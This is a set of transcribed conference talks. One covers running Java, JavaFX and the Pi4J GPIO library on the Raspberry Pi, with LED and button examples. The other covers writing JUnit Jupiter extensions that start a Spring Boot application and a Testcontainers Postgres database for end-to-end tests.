Welcome in my talk, the future of Java on the Raspberry Pi here at Fosdome. Happy to be here at this virtual conference, a bit strange times, but happy that we still can share all these Java goodies. Let me introduce myself, I'm Frank Dopport, I live in Belgium, I do a lot of blogging on WebTec.be on my own blog and also on Fujie. I've been programming since I was 10 years old a long time ago and it all started with this Commodore 64, which was a great device and allowed me to already start with electronics and connect, for instance, my Lego trains with this Commodore so I could control my Lego train. I'm working at TODI as a software developer, but most of the knowledge I have about Embedded and Raspberry Pi and Arduino actually comes from CodeDojo, a computer club where we teach kids to work with computers, to program, to present what they've done, to work together, to think about IDs and how to solve certain problems. The coaches at CodeDojo bring their own knowledge to these events and that's where I first learned about Raspberry Pi and Arduino and this amazing hardware at a very low price, which allows you to do a lot of great stuff. Because I love Java, I combined all this because I wanted to create a drum boot for my son and you see it has a touchscreen, it is controlled by Raspberry Pi and Arduino for the LED strips and you can control different devices on 220 volts. This was actually my first Raspberry Pi project where I wanted to use Java and Java FX and it all led to this book where I described my whole journey, what I learned doing all this, how I started with installing Java FX on a Raspberry Pi, how the pins work, where you connect the electronic components, build for instance this small chart to show a temperature measurement or control an 8x8 LED matrix, all very cheap electronics components that you can use on the Raspberry Pi and which you can control with Java like for instance getting the weather forecast from an API and show it on a small display. Also spring works on the Raspberry Pi of course and it allows you to build rest services to control the LEDs or read the button state or store data and then of course you have this application that I used in the drum boot of my son to control a LED strip and here it even uses a Q and an Arduino to connect multiple devices like a PC and a Raspberry Pi and an Arduino and all share the same data. And as Java community is a great community with a lot of great people who are very open to communicate and to discuss certain topics, I also have a lot of interviews in the book and of course this code is shared on Hithub. Now to get to the start what is a Raspberry Pi? It's a very small PC. Everything is here, you only have to connect a screen and a monitor and a mouse and you can get started. You pop in an SD card with the operating system of your choice and you can get started. There are different types of these boards. The B is the most used one and it ranges from 40-80 euros depending on the amount of memory you want to use on the board and you have also some special versions of it or smaller depending on the use case. In 2020 they launched a new compute module and the idea of the compute module is that you embed it into your own projects with the hardware that you design around it. 
So the board, the compute module has all the logic and the memory and then you design a base board with all the peripherals and the connections you really need and you can buy a compute module base board for your experiments and then later replace it with your own version. Also last year they announced the Raspberry Pi 400 which actually is a keyboard with a Raspberry Pi 4 inside it and you see that you also have the connections similar to the Raspberry Pi 4 here. So it's the same Raspberry Pi with the different form factor integrated in the keyboard. And yeah, this let me think where did we see this before indeed that was the same form factor of the first PC I used also with the connector on the back to connect peripherals. The only difference if you compare it to the cost at the current prices is that the Raspberry Pi 400 is 14 times cheaper than what you paid so many years ago for the Commodore 64 and it's very, very powerful because just to compare the screen this is what I was programming in on the Commodore 64 and this is what I'm programming with the Raspberry Pi 4 4K display attached to it. I have two Visual Studio codes open. This is a screenshot while I was writing my book. So you can do a lot of real programming on a very cheap PC. A question I get asked a lot is why would you use Java on a Raspberry Pi? Wasn't it designed for Python? Well actually yes it was when they designed the board they were looking for a fruity name and that's where the Raspberry Pi comes from and they added Pi from the Python language that they were using at that time also from the number Pi of course but it could also have been the Raspberry Java or something like that because Java works just as well. And definitely now that Java is evolving so fast with all these releases every six months a lot of improvements get added but also features which make it more powerful to use it on a Raspberry Pi or other cheap electronic components. And even Oracle thought this is a match made in heaven. I wrote an article for the Oracle Java newsletter describing a first project you can make on the Raspberry Pi with some electronic components and all the code of course and it was one of the most liked and retweeted tweets of last summer because indeed this cheap hardware allows a lot of new people to get into programming and use the language of their choice on any platform. Now if you start with a new Raspberry Pi board and you flash an operating system to an SD card you can download it from the Raspberry Pi website with their imager tool and it's a full Linux system based on Debian 32-bit and if you go for the full version you have OpenGDK 11 pre-installed on it so you can immediately start with any Java project. There is a so it also included in this full Raspberry Pi OS as it's rebranded only recently you see that there is a lot of tools pre-installed not visual studio code but you can install it from their website there is a version available built for the Raspberry Pi and the ARM processor and there is also a 64-bit version because there is already a proof of concept work in progress version of that operating system for 64 bits as the processor allows it. If you install visual studio code and the Java extension pack which all runs without any issue on the Raspberry Pi you can make any Java application on this board. So as I said Java is pre-installed so if you power your Pi for the first time and you do a Java version request you will see that you have version 11 there available. 
If you want to use JavaFX — if you want to make a user interface — you have two choices. Either you select a JDK which has JavaFX included: it's no longer bundled since Java 11, but some of the JDK providers have versions where JavaFX is integrated again, and Liberica from BellSoft is one choice. That's the approach I took in the book, because it allows you to test and develop very easily without any extra configuration: you just download the JDK from their website, configure it, and then you see, for instance, that this is version 13 from BellSoft. But there is also another approach, of course, because JavaFX is a standalone project. It has the same release cycle as Java, so two new versions each year, and it's all powered by Gluon, who maintain this project and also provide the builds. So you can find on their website an OpenJFX version, again built specifically for the Raspberry Pi. The only thing you need to do then is configure it in your IDE, and on the Raspberry Pi give some additional startup commands when you start your application. But this allows you to use the latest features added by Gluon and the community in the OpenJFX project. So for instance, if you look at the screenshot, that's JavaFX 16 running on the Raspberry Pi with Java 11 — you can combine these without any problems; there is no dependency between the latest JavaFX and a particular JDK version, they can live on their own and you can use the versions that you want. And the latest versions of JavaFX have specific Raspberry Pi improvements for direct rendering on the screen and much smoother playback, for instance. Look at this example, which is a video from Gerrit Grunwald, who created this SpaceFX game — so yes, indeed, it's a JavaFX game — and it's running on the Raspberry Pi at almost 60 frames per second; you can see it's very, very smooth.
So a GPIO is a 1 or a 0, true or false if you look at it from the coding side; for the electronics that means 3.3 volt on the Raspberry Pi when it's a 1, and 0 volt when it's a 0, a high or low state for the electronics, or simply on or off for a LED. As you can see, there are some very handy extension boards that you can stack on top of these pins, again to find the right number to use in your program, and on these pins you can connect any kind of device. The easy ones are a LED and a button, but of course you can go a lot further and control a chip for a LED number display or an 8x8 LED matrix, or use serial communication; there are different communication protocols available that you can use to control these electronics. Now let's look at a simple experiment with a button and a LED: we connect the LED to one of the GPIOs to switch it on and off, and we connect a button to read whether it's pressed or not. By the way, as you've seen in the wiring diagram, there is a resistor connected to the LED, because the output is 3.3 volt while the LED needs a lower voltage, otherwise you burn it; that's what the resistor is for. There is an app for that, of course, to calculate which resistor to use, and one of these apps was created by me together with Gluon, just to show how you can create a mobile application with JavaFX and use GitHub Actions to turn it into a native executable using GraalVM for all operating systems (Windows, Mac, Linux) as well as apps for the Google and Apple app stores. They are all built on GitHub with Actions and even pushed to the app stores. It's not part of this presentation, but you can read all about it on my blog or on Foojay, and all the code is of course available and shared on GitHub to show you how easy this is to do. Now, in this wiring diagram we have connected the LED to GPIO 22 and the button to GPIO 24, and we can start using and controlling them from our Raspberry Pi. This is how it looks with some breadboards, which are very handy when you start experimenting with electronics, to set up an experiment very easily and quickly. First we're going to test if this works from the terminal: we configure one of the GPIOs to be in output mode, and then we can send a 1 or a 0 and toggle the LED; you see this is very easy to do from the terminal. We can do the same with the button and read its state: we say we want to use that GPIO as an input pin, and then we can read it; it's a 0 when it's not pressed, and as soon as we press it and read it again, it is a 1. Now, if you want to do this from Java, we can take the easy, let's say the dumb, approach and use plain Java, no dependencies, no imports: we just reuse the terminal command we've just seen and execute it from Java, which is something we can do with Runtime.exec. As you can see in this code, we set GPIO 3 to be an output pin and then toggle it on and off 10 times in a loop, and that's all there is to this very simple Java code.
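A minimal sketch of that "dumb" Runtime.exec approach, assuming the WiringPi gpio command-line utility is installed on the Pi. Note that this utility uses WiringPi numbering, where pin 3 corresponds to BCM GPIO 22, which is exactly the numbering confusion mentioned a bit further on.

    public class LedTest {
        public static void main(String[] args) throws Exception {
            Runtime rt = Runtime.getRuntime();
            // Configure WiringPi pin 3 (BCM GPIO 22) as an output pin
            rt.exec("gpio mode 3 out").waitFor();
            // Toggle the LED on and off 10 times
            for (int i = 0; i < 10; i++) {
                rt.exec("gpio write 3 1").waitFor();   // LED on
                Thread.sleep(500);
                rt.exec("gpio write 3 0").waitFor();   // LED off
                Thread.sleep(500);
            }
        }
    }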
Now, because we have Java 11 pre-installed on our Raspberry Pi, we don't need to compile this separately: we can just run the Java file directly with java. So if we run java with this Java file (in the background it actually compiles it), we wait a little bit and then we get the result of this application, and as you can see and as expected, the LED turns on and off. Now let's make this a real Java project, a Maven project even, and include Pi4J. Pi4J is a library to connect these GPIOs to Java software: on one side it's a library which integrates into your Java application, and it uses native libraries to interface with the hardware and give you access to all these communication protocols and everything you can do with these pins. There is a Pi4J version that has existed for a long time; the latest one is 1.2, released in 2019, but since then a lot has evolved, with new Raspberry Pi versions and changes in the native libraries, so new versions are scheduled: there will be a 1.3 and a 1.4 which support Java 8 and Java 11. But this project has some problems. On one side there is a lot of device support included, which makes it very difficult to maintain, to release new versions, and to test all the features. Maybe the biggest problem is WiringPi, the native library used to control these GPIOs: it was deprecated last year. There was also a lot of confusion when people started using this library, because WiringPi uses a different numbering for the GPIO pins than most other libraries and projects, which use the BCM numbering; you can use both, but it caused a lot of confusion. Now let's look at some of the code if you are still using this version of Pi4J. It's very easy: you just instantiate a controller, and the LED is simply a provisioned output pin; you give it the right pin number and a name, and then you can turn the LED on and off, high and low, with simple commands. Something similar can be done with a button, and then we can give it a change event listener, so here we are really getting into Java code the way we are used to writing it, and the change event listener can do something with the events when the button is pressed or released; in this case we just store when the button was pressed. If you then look at this project, which was also fully described in the article for the Oracle Java newsletter, you can see that from the screen you can toggle the LED, and if you click the button you see on the lower graph that a line is drawn, because we store the timestamps when the button is pressed. We even have a distance sensor attached to this Raspberry Pi, and you see in the upper chart that every second the distance is measured and visualized in a graph as well. So this is a very basic example to show you how to use Pi4J, and it's a touchscreen, by the way, so you can also control it from the screen itself.
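A minimal sketch of how the Pi4J 1.x API looks for that LED-and-button setup. The pin constants use WiringPi numbering (GPIO_03 maps to BCM 22 for the LED, GPIO_05 to BCM 24 for the button), so treat the exact addresses as an assumption for your own wiring.

    import com.pi4j.io.gpio.*;
    import com.pi4j.io.gpio.event.GpioPinListenerDigital;

    public class Pi4jV1Example {
        public static void main(String[] args) throws Exception {
            // One controller instance for the whole application
            GpioController gpio = GpioFactory.getInstance();

            // Provision the LED as a digital output pin, initially off
            GpioPinDigitalOutput led =
                    gpio.provisionDigitalOutputPin(RaspiPin.GPIO_03, "LED", PinState.LOW);

            // Provision the button as a digital input pin with a pull-down resistor
            GpioPinDigitalInput button =
                    gpio.provisionDigitalInputPin(RaspiPin.GPIO_05, "Button", PinPullResistance.PULL_DOWN);

            // React to button state changes with a change event listener
            button.addListener((GpioPinListenerDigital) event ->
                    System.out.println("Button state changed to " + event.getState()));

            // Blink the LED a few times
            for (int i = 0; i < 10; i++) {
                led.high();
                Thread.sleep(500);
                led.low();
                Thread.sleep(500);
            }

            gpio.shutdown();
        }
    }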
Now, what's the future for Pi4J? That's something we're very much looking forward to: a version 2, a completely rewritten and redesigned architecture of the framework, which is fully Java 11 modular and will support all Raspberry Pi boards, because a new native library is being used, pigpio instead of WiringPi, which is very well maintained and has a large community behind it. A choice was also made to reduce the code base and remove all the device support; the example projects are now on GitHub as separate projects, which will make it a lot easier to extend, maintain, and test the library, while these separate example projects live on their own and can have their own release cycle if something has to be changed. It's work in progress, and it's definitely something we want to push forward in 2021 and make a first release of, but it's already there; you can already start using it. There is a website which fully describes it, and we are working on the examples. About pigpio: so a new native library is being used, and this library is again replaceable, as it is a module inside the project, and it uses the Broadcom numbering, removing the confusion between numbering schemes. This is the architecture of the Pi4J version 2 library, where you see that everything becomes modular and separated, which makes it a lot clearer to maintain, and people who want to join the project can very easily find where they want to modify or fix something. Again, let me show you a minimal example with the same button and LED; it is fully described on the version 2 website. Initializing Pi4J version 2 means creating a new auto context: this will automatically detect which platform you are using and which providers are available. There are other initializers where you can configure more yourself, but this will be the perfect starting point for every new project. A button, for instance an input, is configured in a slightly different way, but it's the more modern Java approach of defining and configuring objects. Again we have a listener, and in this case the listener just keeps a counter of the number of times the button is pressed. The LED is configured the same way, with all the options you need for your use case, and in this case we toggle it between high and low at a speed that depends on the press count. Because this uses Java 11 and the module approach, if you package such a project you get a distribution directory with all the modules your project needs, which makes it very easy to install it on a Raspberry Pi and only update the modules you change during the lifetime of your project. Our Maven configuration will also add a run script so that you have everything available to just start it. So if you want to get started and experiment with this, there is the GitHub project with the Pi4J minimal example: you can just clone it, build it on your Raspberry Pi, and run it, and if you have connected the hardware as in the diagram, you will see the LED blinking and can read the button. Now, what did we learn? That Java, and Java on the Raspberry Pi, just work.
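And a comparable sketch in the Pi4J version 2 style, loosely based on the minimal example just described. The builder method names and the BCM addresses (22 for the LED, 24 for the button) are written from memory, so treat them as an approximation and check the Pi4J v2 website for the exact API.

    import com.pi4j.Pi4J;
    import com.pi4j.context.Context;
    import com.pi4j.io.gpio.digital.*;

    public class Pi4jV2Example {
        public static void main(String[] args) throws Exception {
            // Auto context: detects the platform and the available providers
            Context pi4j = Pi4J.newAutoContext();

            // Button on BCM GPIO 24, with a pull-down resistor
            DigitalInput button = pi4j.create(DigitalInput.newConfigBuilder(pi4j)
                    .id("button")
                    .address(24)
                    .pull(PullResistance.PULL_DOWN)
                    .build());

            // LED on BCM GPIO 22, initially off
            DigitalOutput led = pi4j.create(DigitalOutput.newConfigBuilder(pi4j)
                    .id("led")
                    .address(22)
                    .initial(DigitalState.LOW)
                    .shutdown(DigitalState.LOW)
                    .build());

            // Count the button presses with a listener
            button.addListener(event -> {
                if (event.state() == DigitalState.HIGH) {
                    System.out.println("Button pressed");
                }
            });

            // Blink the LED
            for (int i = 0; i < 10; i++) {
                led.toggle();
                Thread.sleep(500);
            }

            pi4j.shutdown();
        }
    }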
I find JavaFX a really amazing tool to build user interfaces which are great looking, easy to configure, easy to extend, easy to program, and of course easy to combine with electronics. That's where the fun starts: when you combine this with your Java knowledge and want to learn more about electronics, or maybe you're an electronics expert who wants to start doing some software with it, this is a great starting point. And as always with Java, by selecting the right dependencies and using existing projects and libraries, you can create amazing applications with minimal code. There is a lot to look forward to: native support, as GraalVM is also coming to the Raspberry Pi, including 32-bit; version 2 of Pi4J, which will make it even easier to combine Java and electronics; and JavaFX, which keeps evolving and is very performant and fast on the Raspberry Pi. Now, what's next? If you want to learn more, visit the Pi4J website and my blog; Foojay of course has a full category for the Raspberry Pi; and above all: build, experiment, and have fun, that's the one thing I can advise you to do. If there are questions, I'm here in the chat to answer them. If you do some experiments and want to share them, post them on Twitter with the hashtag JavaOnRaspberryPi, and if you want to read more, visit my blog, Foojay, or the book. Thanks a lot and have fun.
|
Java on the Raspberry Pi is still a controversial topic, but recent evolutions of both the JDK and OpenJFX have proven they are a perfect match! In this talk we will look at some examples and discuss what the next steps could be. We will take a look at the current state of Java, JavaFX, and Pi4J on the Raspberry Pi. Most Java developers haven't yet considered the Raspberry Pi as the perfect board to run their applications on, but with its low price and high specifications, the Raspberry Pi is opening up whole new worlds.
|
10.5446/52795 (DOI)
|
Hi to all, this is Karl Heinz Marbaise speaking, with a lecture about JUnit Jupiter extensions and writing end-to-end tests. If you would like to contact me, you can do that via Twitter, via GitHub, or via email; take a look at this slide. Some words about me: I'm working as a German freelancer with different technologies like Java, Docker, Jenkins, Spring Boot, and so on, as you see on the slide. The agenda for this lecture: first the example application we would like to end-to-end test, what it looks like and so on. Then we will see what the JUnit platform looks like and how to use it, then writing some unit tests with JUnit Jupiter, what the details are and what is needed or not. After that we get to running end-to-end tests and what is needed to do real end-to-end testing, and then we start writing an extension with JUnit Jupiter to run those end-to-end tests. Finally we have a Q&A session. To begin with, we need an example application on which we would like to do some end-to-end testing. I have decided to use a Spring Boot application, a very simple one of course, for demonstration purposes, which has two REST API endpoints and writes to a database; in this case I am using a Postgres database. We will take a look into the code now. In the code we start with the Spring Boot application, the main application class, which is very simple in this case. We have two controllers: a simple Hello World controller, called HelloController, which is very easy, and an employee controller with two different endpoints, one called create and one called list. The create endpoint will, with each POST call, create a single entry in the database, while the list endpoint just lists all the entities which exist in the database. So this is the connection to an external service which we need to run our application. We have of course our Employee entity defined, which is very basic, nothing fancy at the moment. So we have an application. I have decided on a slightly larger project which comprises three different modules: application, e2e, and extension. We will talk about e2e and extension later; now we will take a look at what the JUnit platform looks like. So let's take a brief look at the architecture of the JUnit 5 platform, which in general comprises two parts: an engine, usually the JUnit Jupiter engine, shown in green in the middle, and the platform. Those two parts communicate with each other. The JUnit Jupiter engine is responsible for finding tests, identifying what a test is and what it looks like, and then giving that information back to the platform, which uses the platform runner to execute the tests. This completely decouples the IDEs and build tools from the identification of tests and from finding out what a test is. Sometimes it's useful or necessary to filter out some of the found tests based on particular filtering criteria; that can be done as well, and then you have a complete decoupling, via the platform, between the engine and your real tests.
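Going back to the example application for a moment, here is a hedged sketch of what such an employee controller could look like; the class names, paths, and the Spring Data repository are assumptions, not the exact code shown in the talk.

    import java.util.List;
    import org.springframework.web.bind.annotation.*;

    // The Employee entity and its Spring Data repository are assumed to exist
    // elsewhere in the project, roughly like this:
    //   @Entity public class Employee { @Id @GeneratedValue Long id; String name; ... }
    //   public interface EmployeeRepository extends JpaRepository<Employee, Long> {}

    @RestController
    @RequestMapping("/employees")
    public class EmployeeController {

        private final EmployeeRepository repository;

        public EmployeeController(EmployeeRepository repository) {
            this.repository = repository;
        }

        // POST /employees/create: every call creates a single entry in the database
        @PostMapping("/create")
        public Employee create(@RequestBody Employee employee) {
            return repository.save(employee);
        }

        // GET /employees/list: lists all entities that currently exist in the database
        @GetMapping("/list")
        public List<Employee> list() {
            return repository.findAll();
        }
    }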
If you take a look on the left side you see the vintage engine, which is responsible for running, and of course identifying, the JUnit 4 tests. That means you can combine JUnit 4 and JUnit 5 tests in a single project, which is very convenient for migrating from JUnit 4 to JUnit 5-only tests. On the right side you see another option: you can implement your own test engine that identifies tests and so on, and if you have done that correctly via the interfaces which exist in the JUnit platform, you automatically get integration into your IDE and build tools without any supplemental implementation. That makes it very easy and comfortable to use such an engine; most of the time you don't need to implement your own engine, but it is possible. So, on to unit tests. Here we have a simple test class which contains two unit tests, first test and second test, annotated with the appropriate @Test annotation. Sometimes you need to do something before each test, set something up or initialize something. That can be achieved simply by using the @BeforeEach annotation on an appropriate method. If you need to tear something down afterwards, you use @AfterEach with an appropriate method. If you have setup that needs to be done only once before all the tests, you can use @BeforeAll, which has to be a static method, because the instantiation of the test class, in the standard lifecycle, is done separately for each test. So such one-time setup and teardown has to go into @BeforeAll or @AfterAll. Now let's think about what is needed to run a real end-to-end test. We have to start all the parts which are needed for our application, for example a database or Redis or something like that. Then we have to start the application itself. Then we do the testing, whatever that is: accessing the database, accessing REST endpoints, or whatever. Finally we need to shut down the application itself, and last we have to shut down the other parts like the database or Redis or whatever we are using. Okay, now let us translate these steps into the annotations used by JUnit Jupiter. In @BeforeEach we need to start up all the components and start up the application, then do the test in the real test method, which is of course annotated with @Test, and then in @AfterEach we have to shut down the application and shut down all the components we have. If we think about that approach, it becomes clear that you are writing a lot of code inside your @BeforeEach and @AfterEach methods for starting up the application and its dependencies like the database, Redis, and so on, and for shutting them down again. It becomes less clear where the real test code is, and it clutters the test code with application and component setup and shutdown logic. On the other hand, it is very easy to do, but we should think of a better approach. A good solution is to use JUnit Jupiter's support for so-called extensions. JUnit Jupiter has a lot of extension points where you can intercept different calls, for example before each, after each, before test execution, and so on. Let us take a look at a clearer diagram.
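A minimal sketch of such a plain JUnit Jupiter test class with the lifecycle methods just described:

    import org.junit.jupiter.api.*;

    class FirstUnitTest {

        @BeforeAll
        static void beforeAll() {
            // one-time setup, executed once before all tests of this class
        }

        @BeforeEach
        void setUp() {
            // executed before every single test method
        }

        @Test
        void firstTest() {
            Assertions.assertEquals(2, 1 + 1);
        }

        @Test
        void secondTest() {
            Assertions.assertTrue("JUnit".startsWith("J"));
        }

        @AfterEach
        void tearDown() {
            // executed after every single test method
        }

        @AfterAll
        static void afterAll() {
            // one-time teardown, executed once after all tests of this class
        }
    }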
Back to the extension points: in a simplified view of the calling order you have different callbacks, like the before-all callback, the before-each callback, the before-test-execution callback, and then the parts marked orange. That means the BeforeAllCallback method is called before the @BeforeAll of the user code, and the BeforeEachCallback is called before the @BeforeEach of the user code in your test. So we can intercept these points: in a BeforeEachCallback, for example, we can start our application and the needed parts, and in the AfterEachCallback we can stop the application and the needed parts again. That's the way we will go, using an extension built on these callbacks. Now we are in the code, starting with my end-to-end test as an example. Here you see the test method I have defined, which is annotated as usual with the @Test annotation. But you also see an annotation you may not be familiar with, because I have defined it myself: the @E2ETest annotation, which I defined for running these end-to-end tests. It looks like a usual annotation with the targets where I'm allowed to put it, and the very important part, where we enter the JUnit area, is the reference to a class: the class I am using here is E2EExtension. We start by implementing some callback interfaces. Let's begin with BeforeEachCallback, which is simply an interface containing a single method, the beforeEach entry point we've seen on the previous slide. Looking at how it is implemented: we start the database container, as described earlier, then we start our application, which I will explain in more detail later, and wait until it is up. The same has to happen for shutting the application down, which is done via the AfterEachCallback: in afterEach we stop the application and then we stop the database. This could be much more than just a database; you can start and stop any of the components you use here. And then we're done with that. So let us run it on the command line first and see how it works; that will take a few seconds. I'm building the multi-module project and running it via a supplemental profile; we will take a look at the configuration later. Okay, it finished, and you see it took around 13 seconds. Let us take a look at what is really happening. I've created a separate module where I have the real test, and a directory is created there: you see there is a directory named after the test method, called first test. In that directory you will find the application standard output, which means the startup log of the complete application, in this case the Spring Boot application, with all the information you need. I have standard error, which should usually be empty, and a GC log, which exists because I configured it in the startup arguments of the application on the command line. If you want to see more, because I'm using Maven, you can also take a look into the failsafe report directory.
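A skeleton of that combination of a custom annotation and an extension, as a hedged sketch; the names follow the talk, and the method bodies are only outlined.

    import java.lang.annotation.*;
    import org.junit.jupiter.api.Test;
    import org.junit.jupiter.api.extension.*;

    // Custom annotation that pulls in the extension via @ExtendWith
    @Target({ElementType.METHOD, ElementType.TYPE})
    @Retention(RetentionPolicy.RUNTIME)
    @ExtendWith(E2EExtension.class)
    @interface E2ETest {
    }

    class E2EExtension implements BeforeEachCallback, AfterEachCallback {

        @Override
        public void beforeEach(ExtensionContext context) throws Exception {
            // start the database container, start the application, wait until both are ready
        }

        @Override
        public void afterEach(ExtensionContext context) throws Exception {
            // stop the application, then stop the database container
        }
    }

    class EmployeeE2EIT {

        @Test
        @E2ETest
        void firstTest() {
            // call the REST endpoints of the running application and assert on the results
        }
    }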
In that failsafe report directory there is an output text file that contains all the output created during this run. There you see the startup of Testcontainers and a Docker container being started, and if you go further down you see the startup of the Postgres database; you can see the Postgres image being downloaded, which takes some time. Going further down through the file, you can see the check whether our container is running, meaning whether our application is running: we use the health check of the application and just poll it, waiting until it's really ready. Most services today have a health check, so it can easily be used for things like this. Once it's up, we know the application is running, and then you see the system output which I put into the example test. So now, how does all of this work inside the extension? There are two more important pieces. The database container is one of them: a very simple class which contains a start method that uses Testcontainers to start a Postgres image. We expose a port, we retry several times to be a bit more robust, and we set a timeout in case something goes wrong. Then we define some environment variables for the username, the password, and the database we are using, and delegate to Testcontainers. We do the same for the stop method and some other things. We can then use this in our extension, start it, and simply wait until it has started; that is a synchronized call in this case, so we wait until the database container is completely up. You could start other things the same way, for example Redis or whatever you like. We also create some directories where we store the resulting standard output and similar information; that is done by these constructs here: we get some information from the context and, based on that, create directory names, so we can store everything in a separate directory and keep each test run apart. Then we have the application ports part, where it is important to create distinct TCP ports. Using the socket utilities from the Spring Framework we obtain two free ports and define them: one for the application and one for the actuator, the actuator being exactly where the health check lives. We keep them separate and hand them back to the extension, which puts them on the command line to define the server port and the management port. There are also getter methods defined on the database container to get the information about the JDBC URL and how it is constructed. One supplemental word about the mapped port: if you start a container on the command line and use -P (uppercase P), a TCP port is selected automatically which definitely doesn't clash with other ports. If you do that manually and do it twice, you can get a clash between the ports, so usually you should let Docker handle that. So now we have our database; one more thing we need to do is start up our real application.
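Before moving on to the application itself, here is a rough sketch of such a database container wrapper using the Testcontainers PostgreSQL module; the image tag and credentials are assumptions, and the retry and timeout handling from the talk is left out for brevity.

    import org.testcontainers.containers.PostgreSQLContainer;

    public class DatabaseContainer {

        // The PostgreSQL module exposes port 5432 and passes the user, password,
        // and database name to the container as environment variables.
        private final PostgreSQLContainer<?> postgres =
                new PostgreSQLContainer<>("postgres:13")
                        .withUsername("app")
                        .withPassword("secret")
                        .withDatabaseName("appdb");

        public void start() {
            // Blocks until the container is reported as started
            postgres.start();
        }

        public void stop() {
            postgres.stop();
        }

        public String getJdbcUrl() {
            // Contains the host and the dynamically mapped port
            return postgres.getJdbcUrl();
        }
    }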
To start the real application I created a class called ApplicationExecutor. It gets the directory it should start in and the name of the application jar. Technically it's not doing anything special: it starts the JVM from the Java home, checks that the file exists, and you see the JVM arguments; that's the reason we get a GC log, for example, and you can change those for your requirements. It adds some supplemental arguments like -jar and the startup arguments for Spring Boot, prints them to the logger to have more information in case of errors, and then starts the application via a ProcessBuilder, redirecting the error stream and setting a working directory. After that you can start the application and wait until it's up. The isReady check simply uses the REST endpoint, meaning the actuator health check endpoint, to wait until the application is available. That can be done in different ways depending on your application, but this one works for most cases, because many applications today have the actuator enabled anyway, for something like Prometheus endpoints, so the health check endpoint can be used to wait until the application is started. Going down, in afterEach we shut down the database and wait until it's really down; the application is shut down with a kill signal, and then we wait until it has terminated completely. I'll look at the details later. The result is that we get all the output and can see that everything started correctly, and if I look at the output created by the failsafe plugin you see all of this: the health check is done, and the information is printed that my test method has been executed. One nice thing is that, done this way, I can very easily add a second test without a big issue. If I simply do that and run it again (which will take some time, of course), you see it takes 24 seconds, because we have started two tests, meaning the complete application plus the database container has been started twice, just sequentially. You can see the results: one application startup log is there, and a second one is now created, and you see the same thing in it. You also still have the possibility to use the usual @BeforeEach in your test to do something special for each application start; in this case I do that and call the REST endpoint of my application, creating supplemental entries in the database by calling the create endpoint. Here I'm just printing something out; for a real use case you would do something different. So I can rerun that, and then you can see the result.
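A hedged sketch of such an application executor; the JVM arguments, file names, and Spring Boot properties are examples along the lines described, not the exact code from the talk.

    import java.io.File;
    import java.net.URI;
    import java.net.http.*;
    import java.nio.file.Path;
    import java.util.List;

    public class ApplicationExecutor {

        private Process process;

        public void start(Path workingDirectory, Path applicationJar,
                          int serverPort, int managementPort) throws Exception {
            String java = System.getProperty("java.home") + "/bin/java";
            List<String> command = List.of(
                    java,
                    "-Xlog:gc*:file=gc.log",                 // JVM arguments, e.g. the GC log
                    "-jar", applicationJar.toString(),
                    "--server.port=" + serverPort,           // Spring Boot startup arguments
                    "--management.server.port=" + managementPort);

            process = new ProcessBuilder(command)
                    .directory(workingDirectory.toFile())
                    .redirectOutput(new File(workingDirectory.toFile(), "application-stdout.log"))
                    .redirectError(new File(workingDirectory.toFile(), "application-stderr.log"))
                    .start();
        }

        // Poll the actuator health endpoint until the application reports itself as up
        public void waitUntilReady(int managementPort) throws Exception {
            HttpClient client = HttpClient.newHttpClient();
            HttpRequest request = HttpRequest.newBuilder(
                    URI.create("http://localhost:" + managementPort + "/actuator/health")).build();
            for (int attempt = 0; attempt < 60; attempt++) {
                try {
                    HttpResponse<String> response =
                            client.send(request, HttpResponse.BodyHandlers.ofString());
                    if (response.statusCode() == 200) {
                        return;
                    }
                } catch (Exception notYetReachable) {
                    // application not listening yet, keep polling
                }
                Thread.sleep(1000);
            }
            throw new IllegalStateException("Application did not become ready in time");
        }

        public void stop() throws InterruptedException {
            if (process != null) {
                process.destroy();   // send the kill signal
                process.waitFor();   // wait until it's completely down
            }
        }
    }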
That takes a number of seconds, around 30 seconds; yes, you see about 25 seconds, and then in the output or in the log file you can see that the health check of the second run is done, that the create endpoint is called several times, and that the list endpoint is called as well, and you can see the information coming back from our application, which you can use for whatever purpose you like. Furthermore, there are some special things needed to get this running correctly internally: there is a so-called store, which I mentioned before. I store things in the ExtensionContext provided by the JUnit Jupiter framework. Internally this store is more or less a synchronized hash map, so you can use it in a multi-threaded environment. You should use a namespace for your own extension, usually based on the name of the class including the package, and into that store you can put information. One important detail: you should also use the unique ID, which is a combination of the engine being run, like JUnit Jupiter, the class name, and the method name, for example first test or second test in our class. That means you can store the information about the database container per test, and in consequence you can run all of this in parallel. That's a very good thing, particularly when you run such complex and time-consuming end-to-end tests: you can run them in parallel, but you have to be a little careful about what exactly you store and how you retrieve it. Usually there is no other way to pass information from beforeEach to afterEach; using a local field is a bad idea because it does not work reliably and is of course not thread-safe, so using the store is the only correct way to do it. Then, in afterEach, you can get the instance of the DatabaseContainer class, for example, to stop it, and also the application process which was stored in the beforeEach method. This is what makes it possible to run the tests in parallel. One more thing: to support parameters you have to implement an interface called ParameterResolver. It is used to check whether the parameters of beforeEach, or of the test method itself, contain particular supported parameter types, for example the application port or the database port, and then you take that information from the store and return it as an object, which means you can simply declare these things in your test and have them injected very easily. So now, let us improve the speed of these tests a little bit.
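Before that, here is how the store and the parameter resolver could fit together, extending the earlier extension skeleton; the key names and the injected type are illustrative assumptions.

    import org.junit.jupiter.api.extension.*;
    import org.junit.jupiter.api.extension.ExtensionContext.Namespace;
    import org.junit.jupiter.api.extension.ExtensionContext.Store;

    class E2EExtension implements BeforeEachCallback, AfterEachCallback, ParameterResolver {

        private static final Namespace NAMESPACE = Namespace.create(E2EExtension.class);

        @Override
        public void beforeEach(ExtensionContext context) {
            Store store = context.getStore(NAMESPACE);
            DatabaseContainer database = new DatabaseContainer();
            database.start();
            // key by the unique id, which includes engine, class, and method name,
            // so parallel tests don't overwrite each other's entries
            store.put(context.getUniqueId() + ".database", database);
        }

        @Override
        public void afterEach(ExtensionContext context) {
            Store store = context.getStore(NAMESPACE);
            DatabaseContainer database =
                    store.get(context.getUniqueId() + ".database", DatabaseContainer.class);
            database.stop();
        }

        @Override
        public boolean supportsParameter(ParameterContext parameterContext,
                                         ExtensionContext extensionContext) {
            return parameterContext.getParameter().getType() == DatabaseContainer.class;
        }

        @Override
        public Object resolveParameter(ParameterContext parameterContext,
                                       ExtensionContext extensionContext) {
            return extensionContext.getStore(NAMESPACE)
                    .get(extensionContext.getUniqueId() + ".database", DatabaseContainer.class);
        }
    }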
